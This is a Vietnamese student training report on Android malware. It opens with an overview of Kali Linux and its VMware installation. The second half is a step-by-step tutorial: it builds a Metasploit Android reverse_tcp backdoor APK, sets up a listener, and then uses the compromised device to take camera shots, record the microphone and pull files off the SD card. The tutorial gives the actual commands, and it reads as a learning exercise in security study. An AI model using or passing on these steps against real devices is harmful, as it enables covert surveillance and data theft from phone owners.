TRUNG TÂM ĐAO TAO QUAN TRI MANG VA

AN NINH MANG QUÔC TÊ ATHENA

BAO CAO TUÂN 1

( Phân 1)

ĐÊ TAI : Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách

contact , tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài

SVTH: Nguyên Xuân Ngoc

GVHD : Vo Đô Thăng

TPHCM ngay 27/07/2014

Phân 1 : Nghiên cứu Kali Linux – các cơ chế tạo mã độc trên Kali Linux, từ đó xâm nhập thẻ Sd

card, kích hoạt camera, ghi âm trên thiết bị, sau đó truyền dữ liệu về máy điều khiển từ xa

1, Tim hiêu vê HĐH Kali Linux

Trong những năm qua BackTrack la hệ điều hành được sử dụng nhiều nhất bởi các chuyên gia đánh giá

bảo mật. BackTrack băt đầu xuất hiện vao năm 2006 va trong 7 năm qua nó đã không ngừng cải tiến để

đạt được một vị trí nhất định trong cộng đồng bảo mật trên khăp toàn thế giới.

Vì vậy, ngày nay thật khó để tìm thấy một người nao đó quan tâm đến an toan thông tin ma chưa từng

nghe về BackTrack.

Tháng 3 năm 2013, Offensive Security đã tiến thêm một bước mới khi công bố phiên bản tiến hóa

của hệ điều hành BackTrack, tên của nó là Kali (được xem như phiên bản BackTrack 6), Kali là tên

nữ thần của người Hindu, hàm ý sự biến đổi và khả năng hủy diệt hay có lẽ là tên một môn võ thuật của

người Philippine ...

Để qua một bên chuyện tên với tuổi, DNA nghĩ rằng Kali Linux là một OS rất hữu ích đối với những

chuyên gia đánh giá bảo mật, một OS tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà bất

kỳ một chuyên gia đánh giá bảo mật nao cũng cần sử dụng đến khi tác nghiệp.

Ưu điểm và Nhược điểm:

Cố găng "bới lông tìm vết" những nhược điểm của Kali là một nhiệm vụ vô cùng khó khăn nên DNA

sẽ băt đầu bằng cách giới thiệu qua một số ưu điểm của nó. Nói vê ưu điêm của Kali là nói vê những

thay đổi giữa BackTrack và Kali.

DNA giả sử rằng các bạn đã biết về BackTrack và khả năng của nó. Đối với những người chưa biết

BackTrack, nói một cách ngăn gon BackTrack là một bản phân phối Linux dựa trên nền tảng hệ điều

hành Ubuntu, với nhiều công cụ bảo mật được phân loại ro rang để sử dụng.

Vậy tại sao BackTrack lại tiến hóa thanh Kali? Sau đây la những thay đổi bên trong Kali va cũng chính

là những ưu điểm của nó:

Kali phát triển trên nền tảng hệ điều hành Debian

Điều nay có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên la các Repository (Kho lưu trữ phần mềm) được

đồng bộ hóa với các Repository của Debian nên có thể dê dang có được các bản cập nhật vá lôi bảo mật

mới nhất và các cập nhật Repository. Duy trì cập nhật (up-to-date) đối với các công cụ Penetration Test

là một yêu cầu vô cùng quan trong.

Một lợi thế khác là moi công cụ trong Kali đều tuân theo chính sách quản lý gói của Debian. Điều này

có vẻ không quan trong nhưng nó đảm bảo rõ ràng về mặt cấu trúc hệ thống tổng thể, nó cũng giúp cho

chúng ta có thể dê dang hơn trong việc xem xét hoặc thay đổi mã nguồn của các công cụ.

Tính tương thích kiến trúc

Một ưu điểm quan trong trong Kali la nó đã cải tiến khả năng tương thích với kiến trúc ARM. Từ khi

Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. Bạn nghĩ gì về việc build Kali trên một

Raspberry Pi hoặc trên Samsung Galaxy Note ? Khá tuyệt vời, bạn có nghĩ vậy không ☺ ?

Hỗ trợ mạng không dây tốt hơn

Một trong những vấn đề được các nhà phát triển Kali chú trong nhiều nhất, chính là sự hô trợ cho một

số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay USB Dongles. Một yêu cầu quan

trong khi các chuyên gia bảo mật thực hiện đánh giá mạng không dây.

Khả năng tùy biến cao

Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với giao diện, giờ đây

người dùng đã có thể chon cho mình nhiều loại Desktops như GNOME, KDE hoặc XFCE tùy theo sở

thích và thói quen sử dụng.

Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai

Đối với bất cứ ai sử dụng Kali, đây la một tính năng quan trong khi bảo trì hệ điều hành Kali. Với

BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta đều phải cài lại mới hoàn toàn

(Ngoại trừ phiên bản R2 lên R3 năm ngoái).

Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hanh Debian, Kali đã dê dang hơn trong

việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không phải cài lại mới hoàn toàn nữa.

Vô số tài liệu hướng dẫn

Một điều quan trong khác cũng không kém, đó la Kali có rất nhiều tài liệu hướng dẫn trên Internet (như

Chuyên Trang Pentest của DNA chẳng hạn), giúp cho bạn có thể hiểu rõ về Kali, biết cách sử dụng

những công cụ chuyên dụng khi thực hiện công việc đánh giá bảo mật.

Như bạn thấy, Kali không chỉ là một phiên bản mới của BackTrack, mà nó chính là một sự tiến hóa

thực thụ. Về khuyết điểm, thật khó khi phải nói người viết đã không tìm thấy bất kỳ hạn chế nào liên

quan đến việc sử dụng Kali cho công việc đánh giá bảo mật.

Mục đích của các nhà phát triển Kali là duy trì và cung cấp các bản cập nhật mới nhất để Kali trở thành

sự lựa chon tốt nhất cho bất cứ ai tìm kiếm một hệ điều hành Pentest, một hệ điều hành dành cho công

việc đánh giá bảo mật chuyên nghiệp.

2, Cai đăt Kali Linux trên may ao VMWare

Điều kiện cài đặt

Tối thiểu là 8 GB ổ cứng

Đối với kiến trúc i386 và amd64, tối thiểu là 512MB RAM.

Hỗ trợ khởi động CD-DVD Drive / USB

Đầu tiên tải file ISO Kali Linux về , có thể vao http://www.kali.org/downloads/ để tải ,mình dùng

phiên bản Kali Linux 1.0.7 64bit để hướng dẫn cai đặt.

Tải va cai đặt phần mềm VMWare vao máy , mình dùng phiên bản Phiên bản VMWare workstation

10.0.0

Khởi động VMWare , chon Create Virtual Machine

sau đó lam như các hình dưới đây :

Tiếp theo cứ bấm next , next … finish , Máy ảo Kali Linux sẽ tự động mở .

Graphic install: sẽ cai đặt khá rê ràng nên mình sẽ chon để cai đặt

tiếp theo là sẽ chon ngôn ngữ cho hệ điều hành

tiếp la điền tên cho hệ điều hành

và password

ở đây sẽ là cấu hình cho dock mình để mặc định là eastern

đây la bạn chon ổ đĩa cai đặt

giờ chỉ cần đợi cai đặt xong là ok

Man hình máy ảo sau khi cai đặt xong Kali Linux :

Hoan tất quá trình cai đặt Kali Linux trên máy ảo VMWare .

Phân 2 : Tạo mã độc trên Kali Linux để xâm nhập Android .

Một báo cáo mới vừa được công bố, cho thấy mức độ nghiêm trong của mã độc trên Android - hệ điều

hanh di động phổ biến nhất thế giới có đến 99,9% số lượng mã độc mới được phát hiện trong quý I

năm 2013 được thiết kế để nhăm đến nền tảng Android. Đây la một con số báo động về tình trạng mã

độc trên nền tảng di động của Google vừa được hãng bảo mật Kaspersky Lab công bố.

Phần lớn trong số các loại mã độc trên Android là virus trojan, một dạng virus chủ yếu để sử dụng để

đánh căp tiền của người dùng bị lây nhiêm bằng cách gửi đến ho những tin nhăn lừa đảo, đoc lén các

thông tin cần thiết và gửi báo cáo đến nơi khác, ăn căp thông tin như la mật khẩu và số thẻ tín dụng, cài

đặt lén các phần mềm chưa được cho phép, ….. Loại mã độc này chiếm đến 63% tổng số các loại mã

độc mới được phát tán trên Android trong quý I năm 2013.

Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy android tải về và mở

payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy ảo Kali Linux bằng Vmware, ta nên

thiết lập phần Network như sau:

Bấm vào VM -> Settings... ở thanh lựa chon của Vmware

Bấm vào Network Adapter và chọn Bridged: connection directly to the physical network

Bấm vào Edit -> Virtual Network Editor...

Trên phần Bridge (connect VMs directly to the external network) chon adapter của máy thật

Sau đây ta vao phần chính tạo backdoor và xâm nhập điều khiển android

Đầu tiên mở terminal và gõ dòng lệnh

Msfpayload android/meterpreter/reverse_tcp lhost=192.168.0.104 lport=8080 R >

/root/Desktop/files.apk

192.168.0.104la địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig để xem IP của máy Kali

8080 là số port, có thể chon port khác, không nên chon các port thường sử dụng 0-1023

Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính la một Metasploit reverse tcp

backdoor.

Tiếp theo, gõ lệnh msfconsole

Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ lệnh sau:

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.0.104 – nhập địa chỉ IP giống với khi tạo payload ở trên.

set lport 8080 – nhập port giống với port khi tạo payload ở trên.

Exploit

Màn hình sẽ như sau, lúc nay ta đang chờ một máy android mở backdoor.

Thử với một máy Galaxy nexus giả lập, tải về files.apk, cai đặt và mở lên được giao diện như dưới,

nhấp vào nút reverseTCP

Vậy la ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như sau:

Để xem thông tin về máy, nhập lệnh SysInfo

• Sử dụng camera:

Để xem danh sách camera, nhập webcam_list

Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách camera ở

phần trước. Ví dụ như sau:

File hình đã chụp từ camera của máy android là FrumITki.jpeg được lưu ở /root của máy

• Ghi âm

Để thực hiện ghi âm, nhập lệnh record_mic và file ghi âm sẽ được lưu về máy

• Lấy file từ sd card

Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục

Ví dụ ở đây, ta tải file App.apk trong thư mục download của sdcard

Dùng lệnh cd /sdcard/Download để vao thư mục

Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh

Download App.apk

Và file này sẽ được tải về thư mục root của máy Kali

Đo la qua trinh sư dung ma đôc trên Kali Linux đê thâm nhâp vao Android